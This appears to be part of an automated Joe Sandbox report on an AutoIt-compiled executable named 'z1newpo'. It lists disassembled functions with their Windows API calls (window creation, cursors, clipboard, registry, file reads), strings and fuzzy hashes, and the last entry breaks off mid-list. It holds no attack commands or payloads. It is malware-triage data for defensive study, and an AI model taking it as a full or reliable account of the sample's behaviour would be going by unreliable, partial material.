                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                                                    • String ID:
                                                    • API String ID: 69173610-0
                                                    APIs
                                                    • DestroyWindow.USER32(?), ref: 004590F2
                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004591AF
                                                    • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004591EF
                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00459200
                                                    • CreateWindowExW.USER32(00000008,AutoIt v3,00000000,?,88C00000,?,?,?,00000001,?,00000000,00000000), ref: 00459242
                                                    • GetClientRect.USER32(00000000,?), ref: 0045924E
                                                    • CreateWindowExW.USER32(00000000,static,00000000,?,50000000,?,00000004,00000500,00000018,?,00000000,00000000), ref: 00459290
                                                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004592A2
                                                    • GetStockObject.GDI32(00000011), ref: 004592AC
                                                    • SelectObject.GDI32(00000000,00000000), ref: 004592B4
                                                    • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004592C4
                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004592CD
                                                    • DeleteDC.GDI32(00000000), ref: 004592D6
                                                    • CreateFontW.GDI32(?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0045931C
                                                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00459334
                                                    • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,?,00000000,00000000,00000000), ref: 0045936E
                                                    • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00459382
                                                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00459393
                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,?,00000000,00000000,00000000), ref: 004593C8
                                                    • GetStockObject.GDI32(00000011), ref: 004593D3
                                                    • SendMessageW.USER32(?,00000030,00000000), ref: 004593E3
                                                    • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004593EE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                    • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                    • API String ID: 2910397461-517079104
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: __wcsnicmp
                                                    • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                                                    • API String ID: 1038674560-3360698832
                                                    APIs
                                                    • LoadCursorW.USER32(00000000,00007F89), ref: 00430754
                                                    • SetCursor.USER32(00000000), ref: 0043075B
                                                    • LoadCursorW.USER32(00000000,00007F8A), ref: 0043076C
                                                    • SetCursor.USER32(00000000), ref: 00430773
                                                    • LoadCursorW.USER32(00000000,00007F03), ref: 00430784
                                                    • SetCursor.USER32(00000000), ref: 0043078B
                                                    • LoadCursorW.USER32(00000000,00007F8B), ref: 0043079C
                                                    • SetCursor.USER32(00000000), ref: 004307A3
                                                    • LoadCursorW.USER32(00000000,00007F01), ref: 004307B4
                                                    • SetCursor.USER32(00000000), ref: 004307BB
                                                    • LoadCursorW.USER32(00000000,00007F88), ref: 004307CC
                                                    • SetCursor.USER32(00000000), ref: 004307D3
                                                    • LoadCursorW.USER32(00000000,00007F86), ref: 004307E4
                                                    • SetCursor.USER32(00000000), ref: 004307EB
                                                    • LoadCursorW.USER32(00000000,00007F83), ref: 004307FC
                                                    • SetCursor.USER32(00000000), ref: 00430803
                                                    • LoadCursorW.USER32(00000000,00007F85), ref: 00430814
                                                    • SetCursor.USER32(00000000), ref: 0043081B
                                                    • LoadCursorW.USER32(00000000,00007F82), ref: 0043082C
                                                    • SetCursor.USER32(00000000), ref: 00430833
                                                    • LoadCursorW.USER32(00000000,00007F84), ref: 00430844
                                                    • SetCursor.USER32(00000000), ref: 0043084B
                                                    • LoadCursorW.USER32(00000000,00007F04), ref: 0043085C
                                                    • SetCursor.USER32(00000000), ref: 00430863
                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 00430874
                                                    • SetCursor.USER32(00000000), ref: 0043087B
                                                    • SetCursor.USER32(00000000), ref: 00430887
                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00430898
                                                    • SetCursor.USER32(00000000), ref: 0043089F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Cursor$Load
                                                    • String ID:
                                                    • API String ID: 1675784387-0
                                                    APIs
                                                    • GetSysColor.USER32(0000000E), ref: 00430913
                                                    • SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                    • GetSysColor.USER32(00000012), ref: 00430933
                                                    • SetTextColor.GDI32(?,?), ref: 0043093B
                                                    • GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                    • GetSysColor.USER32(0000000F), ref: 00430959
                                                    • CreateSolidBrush.GDI32(?), ref: 00430962
                                                    • GetSysColor.USER32(00000011), ref: 00430979
                                                    • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                    • SelectObject.GDI32(?,00000000), ref: 0043099C
                                                    • SetBkColor.GDI32(?,?), ref: 004309A6
                                                    • SelectObject.GDI32(?,?), ref: 004309B4
                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                    • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                    • GetWindowTextW.USER32(00000000,00000000,?), ref: 00430A5A
                                                    • InflateRect.USER32(?,000000FD,000000FD), ref: 00430A86
                                                    • DrawFocusRect.USER32(?,?), ref: 00430A91
                                                    • GetSysColor.USER32(00000011), ref: 00430A9F
                                                    • SetTextColor.GDI32(?,00000000), ref: 00430AA7
                                                    • DrawTextW.USER32(?,?,000000FF,?,00000105), ref: 00430ABC
                                                    • SelectObject.GDI32(?,?), ref: 00430AD0
                                                    • DeleteObject.GDI32(00000105), ref: 00430ADC
                                                    • SelectObject.GDI32(?,?), ref: 00430AE3
                                                    • DeleteObject.GDI32(?), ref: 00430AE9
                                                    • SetTextColor.GDI32(?,?), ref: 00430AF0
                                                    • SetBkColor.GDI32(?,?), ref: 00430AFB
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                    • String ID:
                                                    • API String ID: 1582027408-0
                                                    • Opcode ID: 550e896c7567608c30fce12d6ed7134b72d55419159f0474b5285c649df46e98
                                                    • Instruction ID: b12033eb3fa9204049de4d7caedd8dcf025edfa44633034d6aae7949f8ecba99
                                                    • Opcode Fuzzy Hash: 550e896c7567608c30fce12d6ed7134b72d55419159f0474b5285c649df46e98
                                                    • Instruction Fuzzy Hash: 6F713071900209BFDB04DFA8DD88EAEBBB9FF48710F104619F915A7290D774A941CFA8
                                                    APIs
                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046BAE6
                                                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,00484EA8,00000000,?,00000000,?,?,?), ref: 0046BB40
                                                    • RegCloseKey.ADVAPI32(?,00000001,00000000,00000000,00000000), ref: 0046BB8A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: CloseConnectCreateRegistry
                                                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                    • API String ID: 3217815495-966354055
                                                    • Opcode ID: c70c32215588f8ec8bb03fc6aa478a266b625616447da64362da41b73b816162
                                                    • Instruction ID: 14c723365299aea1e32a80c9e2d98689f85295d348ed372ee81e16963ac3f886
                                                    • Opcode Fuzzy Hash: c70c32215588f8ec8bb03fc6aa478a266b625616447da64362da41b73b816162
                                                    • Instruction Fuzzy Hash: BCE18171604200ABD710EF65C885F1BB7E8EF88704F14895EB949DB352D739ED41CBA9
                                                    APIs
                                                    • GetCursorPos.USER32(?), ref: 004566AE
                                                    • GetDesktopWindow.USER32 ref: 004566C3
                                                    • GetWindowRect.USER32(00000000), ref: 004566CA
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00456722
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00456735
                                                    • DestroyWindow.USER32(?), ref: 00456746
                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456794
                                                    • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 004567B2
                                                    • SendMessageW.USER32(?,00000418,00000000,?), ref: 004567C6
                                                    • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567D6
                                                    • SendMessageW.USER32(?,00000421,?,?), ref: 004567F6
                                                    • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 0045680C
                                                    • IsWindowVisible.USER32(?), ref: 0045682C
                                                    • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00456848
                                                    • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 0045685C
                                                    • GetWindowRect.USER32(?,?), ref: 00456873
                                                    • MonitorFromPoint.USER32(?,00000001,00000002), ref: 00456891
                                                    • GetMonitorInfoW.USER32(00000000,?), ref: 004568A9
                                                    • CopyRect.USER32(?,?), ref: 004568BE
                                                    • SendMessageW.USER32(?,00000412,00000000), ref: 00456914
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: MessageSendWindow$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                                                    • String ID: ($,$tooltips_class32
                                                    • API String ID: 225202481-3320066284
                                                    • Opcode ID: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                    • Instruction ID: fcdb4dd5bfb9c4cfeeadc9569793f3eee26ed74f2078e1bfb0220ba6a1b85fea
                                                    • Opcode Fuzzy Hash: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                    • Instruction Fuzzy Hash: 4CB17170A00205AFDB54DFA4CD85BAEB7B4BF48304F10895DE919BB282D778A949CB58
                                                    APIs
                                                    • OpenClipboard.USER32(?), ref: 0046DCE7
                                                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                    • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                    • CloseClipboard.USER32 ref: 0046DD0D
                                                    • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                    • CloseClipboard.USER32 ref: 0046DD41
                                                    • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                    • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                    • CloseClipboard.USER32 ref: 0046DD99
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                    • String ID:
                                                    • API String ID: 15083398-0
                                                    • Opcode ID: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                                    • Instruction ID: c6f05cb0c77453757aa6b00544986da50a17ac1627668c5aecb5782462309948
                                                    • Opcode Fuzzy Hash: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                                    • Instruction Fuzzy Hash: CE81B072704201ABD310EF65DD8AB5EB7A8FF94315F00482EF605E72D1EB74E905879A
                                                    APIs
                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                    • GetWindowRect.USER32(?,?), ref: 00471CF7
                                                    • GetClientRect.USER32(?,?), ref: 00471D05
                                                    • GetSystemMetrics.USER32(00000007), ref: 00471D0D
                                                    • GetSystemMetrics.USER32(00000008), ref: 00471D20
                                                    • GetSystemMetrics.USER32(00000004), ref: 00471D42
                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471D71
                                                    • GetSystemMetrics.USER32(00000007), ref: 00471D79
                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471DA3
                                                    • GetSystemMetrics.USER32(00000008), ref: 00471DAB
                                                    • GetSystemMetrics.USER32(00000004), ref: 00471DCF
                                                    • SetRect.USER32(?,00000000,00000000,?,?), ref: 00471DEE
                                                    • AdjustWindowRectEx.USER32(?,?,00000000,00000040), ref: 00471DFF
                                                    • CreateWindowExW.USER32(00000040,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 00471E35
                                                    • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00471E6E
                                                    • GetClientRect.USER32(?,?), ref: 00471E8A
                                                    • GetStockObject.GDI32(00000011), ref: 00471EA6
                                                    • SendMessageW.USER32(?,00000030,00000000), ref: 00471EB2
                                                    • SetTimer.USER32(00000000,00000000,00000028,00462986), ref: 00471ED9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
                                                    • String ID: @$AutoIt v3 GUI
                                                    • API String ID: 867697134-3359773793
                                                    • Opcode ID: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
                                                    • Instruction ID: 8cf5fd9e7b0abf2f472dad9b41bae804ea9cb1b32c1b51d65689880f1cfe2d6c
                                                    • Opcode Fuzzy Hash: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
                                                    • Instruction Fuzzy Hash: 7DC17F71A402059FDB14DFA8DD85BAF77B4FB58714F10862EFA09A7290DB78A840CB58
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: _wcscat$FileInfoVersion$QuerySizeValue__wcsicoll_wcscpy_wcslen_wcsncpy
                                                    • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                    • API String ID: 1503153545-1459072770
                                                    • Opcode ID: 76acf26b61918e0ebafe3e9c460c5efedcc98b6992261bc6c4f6588f91b2aee1
                                                    • Instruction ID: bf9a9138137c8e48d15734b0b0bf1383f69a7efb75f9ce998fc77f2ad016157b
                                                    • Opcode Fuzzy Hash: 76acf26b61918e0ebafe3e9c460c5efedcc98b6992261bc6c4f6588f91b2aee1
                                                    • Instruction Fuzzy Hash: D551F672A402043BD610BB269C43EFFB36C9F49715F10055FFE09A6242EA7DEA5183AD
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: __wcsicoll$__wcsnicmp
                                                    • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:$pQH
                                                    • API String ID: 790654849-32604322
                                                    • Opcode ID: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                                    • Instruction ID: c91e69f26a1c2718e03151092e39642ccf44f92bf630fd0466772f198d10bc2a
                                                    • Opcode Fuzzy Hash: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                                    • Instruction Fuzzy Hash: CA317731A0420966DB10FAA2DD46BAE736C9F15315F20053BBD00BB2D5E7BC6E4587AE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7b3c0986a6774ad4839bdf3b3ab280162fe8917d12771473e04c5712f0602a0a
                                                    • Instruction ID: 62dae473257cc2caee0a49c5626d46440081d624880130feb25903cd50123649
                                                    • Opcode Fuzzy Hash: 7b3c0986a6774ad4839bdf3b3ab280162fe8917d12771473e04c5712f0602a0a
                                                    • Instruction Fuzzy Hash: 84C128727002046BE724CFA8DC46FAFB7A4EF55311F00416AFA05DA2C1EBB99909C795
                                                    APIs
                                                      • Part of subcall function 00442C5A: __time64.LIBCMT ref: 00442C66
                                                    • _fseek.LIBCMT ref: 00452B3B
                                                    • __wsplitpath.LIBCMT ref: 00452B9B
                                                    • _wcscpy.LIBCMT ref: 00452BB0
                                                    • _wcscat.LIBCMT ref: 00452BC5
                                                    • __wsplitpath.LIBCMT ref: 00452BEF
                                                    • _wcscat.LIBCMT ref: 00452C07
                                                    • _wcscat.LIBCMT ref: 00452C1C
                                                    • __fread_nolock.LIBCMT ref: 00452C53
                                                    • __fread_nolock.LIBCMT ref: 00452C64
                                                    • __fread_nolock.LIBCMT ref: 00452C83
                                                    • __fread_nolock.LIBCMT ref: 00452C94
                                                    • __fread_nolock.LIBCMT ref: 00452CB5
                                                    • __fread_nolock.LIBCMT ref: 00452CC6
                                                    • __fread_nolock.LIBCMT ref: 00452CD7
                                                    • __fread_nolock.LIBCMT ref: 00452CE8
                                                      • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                                      • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                                      • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                                      • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                                      • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                                      • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                                      • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                                    • __fread_nolock.LIBCMT ref: 00452D78
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
                                                    • String ID:
                                                    • API String ID: 2054058615-0
                                                    • Opcode ID: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                                                    • Instruction ID: 04d0e47ed4a2b248740d2851a73093f1b496c65d3ae4d984919b8c0089c9d159
                                                    • Opcode Fuzzy Hash: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                                                    • Instruction Fuzzy Hash: 6FC14EB2508340ABD720DF65D881EEFB7E8EFC9704F40492FF68987241E6759548CB66
                                                    APIs
                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004487BD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Window
                                                    • String ID: 0
                                                    • API String ID: 2353593579-4108050209
                                                    • Opcode ID: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                                    • Instruction ID: 06508bea8339de1511a48146ac1d08a96458f0089f80555ee302a354f7131a6f
                                                    • Opcode Fuzzy Hash: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                                    • Instruction Fuzzy Hash: 35B18BB0204341ABF324CF24CC89BABBBE4FB89744F14491EF591962D1DBB8A845CB59
                                                    APIs
                                                    • GetSysColor.USER32(0000000F), ref: 0044A05E
                                                    • GetClientRect.USER32(?,?), ref: 0044A0D1
